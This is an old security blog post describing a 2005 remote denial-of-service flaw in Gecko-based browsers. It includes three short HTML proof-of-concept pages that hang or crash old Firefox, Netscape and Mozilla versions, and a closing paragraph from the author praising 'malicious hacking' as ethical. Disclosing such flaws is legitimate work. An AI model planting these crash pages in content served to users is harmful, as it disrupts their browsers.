« Home

Windows 2000/2003 SYN DoS Attack Protection »Think Twice »Cyber Crime Officially More Lucrative than Drug Tr... »Google's AdSense Algorithm »Exploiting Macromedia Flash »Byzantine Owns Jack Thompson »Ethical Malicious Hacking »Owning A Continent, Penetrating Testing with Google »Hacking Gallery v2.4, Zoomblog, XMB and ibProArcade »Wireless Theft » 

Hacking Browsers (Gecko remote DoS)

Published 12.07.2005 by jm | E-mail this post

E-mail this post



Remember me (?)



All personal information that you provide here will be governed by the Privacy Policy of Blogger.com. More...


More browser vulnerabilities. When the firefox hack was discovered, people set out to find more exploitable broswer code. Kubbo found some, utilizing the tags, parsererror, sourcetext, and stylesheet. By using one of these tags, it is possible to cause the system to hang with 100% CPU, and only escape by killing the application. Additionally, by adding link tag using Javascript , with empty not complete href statement, it is possible to cause Gecko based web browsers to crash. Exicute these proofs of concept by copying them into notepad and saving it as an HTML document, and opening it into a suseptable browser. The following browsers are vulnerable.

  • Netscape Browser version 8.0.3.3

  • Netscape version 7.2

  • K-Meleon version 0.9

  • Firefox version 1.0.7 and prior

  • Mozilla suite version 1.7.12 and prior



    • Tag handling:

    Gecko browsers are suseptable to a denial of service condition when managing the following tags:

    <sourcetext>
    <parsererror>

    Example 1:

    < html>
    < head>
    < title>sourcetext element test< /title>
    < /head>
    < body>
    < p>< sourcetext>< /sourcetext>< /p>
    < /body>
    < /html>

    Example 2:

    < html>
    < head>
    < title>parsererror element test< /title>
    < /head>
    < body>
    < p>< parsererror>< /parsererror>< /p>
    < /body>
    < /html>

    Javascript link example:

    < !-- this code copied from Securiteam.com -- >
    < html>
    < script language="JavaScript">
    document.write('< link rel="stylesheet" href="http://">');
    < /script>
    < /html>
    < !-- Affects Firefox 1.0.7 and below. Thanks to Securiteam. -->

      If the human body was never exposed to ailments, it would be impressivly vulnerable to the slightest cold. If our country was never exposed to hacking, it would be oppressivly vulnerable to cyber terrorism. With out the creation of a malicious hacking, Afganistan could have destroyed America's economy with a ping flood. This is why I encourange maclicious hacking, as an ethical practice. Without strengthening our defenses, we are weak. This site is focused on security through knowledge. I detest the fact that so many companies are being exploited because malicious hackers know their security holes before they do. For that reason, I hope to educate where the exploits lay. This isn't a 100% information base, as I only publish things I have been able to implement on myself. No credit is needed anywhere . However if you are a publisher, I would appriciate credit. I am an advocate of open source, so copy and paste and call it your own if you like. If my work is good enough for you to plagerize then that is my biggest compliment . If my work is good enough, I will be approached and asked to write more ... this is natural selection of the digital age .

    Previous hacks

    Previous Hacks



      This link kills spam


      spam IP addresses


      These are sites I block at my firewall.

      cdn2.gms1.net
      gms1.net
      servedby.advertising.com
      advertising.com
      a.tribalfusion.com
      tribalfusion.com
      pimpslord.com
      altfarm.mediaplex.com
      mediaplex.com
      ad.yeildmanager.com
      yeildmanager.com
      doubleclick.net
      isg32.casalemedia.com
      casalemedia.com

      Cost of the War in Iraq
      (JavaScript Error)

    Two very recommended books:


    . . The only hacking forum I have found worth mentioning here